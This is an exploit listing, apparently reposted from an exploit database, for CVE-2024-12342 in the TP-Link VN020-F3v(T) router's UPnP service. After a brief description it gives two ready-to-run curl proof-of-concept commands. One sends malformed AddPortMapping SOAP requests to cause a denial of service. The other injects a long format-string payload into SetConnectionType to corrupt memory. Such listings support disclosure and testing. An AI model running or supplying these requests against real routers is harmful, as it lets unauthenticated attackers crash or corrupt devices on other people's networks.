Exploit for TP-Link VN020 F3v(T) TT_V6.2.1021 Denial of Service CVE-2024-12342

## https://sploitus.com/exploit?id=PACKETSTORM:190533
# Exploit Title: TP-Link VN020 F3v(T) TT_V6.2.1021 - Denial Of Service (DOS)
    # Date: 10/22/2024
    # Exploit Author: Mohamed Maatallah
    # Vendor Homepage: https://www.tp-link.com
    # Version: TT_V6.2.1021 (VN020-F3v(T))
    # Tested on: VN020-F3v(T) Router (Hardware Version 1.0)
    # CVE: CVE-2024-12342
    
    
    Description:
    Two critical vulnerabilities discovered in TP-Link VN020-F3v(T) router's
    UPnP implementation, affecting the WANIPConnection service. The
    vulnerabilities allow unauthenticated attackers to cause denial of service
    and potential memory corruption through malformed SOAP requests.
    
    Proof of Concept 1 (Missing Parameters DoS):
    
    curl -v -X POST "http://192.168.1.1:5431/control/WANIPConnection" \
    -H "Content-Type: text/xml" \
    -H "SOAPAction:
    \"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\"" \
    -d '<?xml version="1.0"?>
    <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
    <s:Body><u:AddPortMapping>
    <NewPortMappingDescription>hello</NewPortMappingDescription>
    </u:AddPortMapping></s:Body></s:Envelope>'
    
    Proof of Concept 2 (Memory Corruption):
    
    curl -v -X POST "http://192.168.1.1:5431/control/WANIPConnection" \
         -H "Content-Type: text/xml" \
         -H "SOAPAction:
    \"urn:schemas-upnp-org:service:WANIPConnection:1#SetConnectionType\"" \
         -d '<?xml version="1.0"?>
    <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
      <s:Body>
        <u:SetConnectionType
    xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
          <NewConnectionType>'"$(perl -e 'print "%x" x
    10000;')"'</NewConnectionType>
        </u:SetConnectionType>
      </s:Body>
    </s:Envelope>'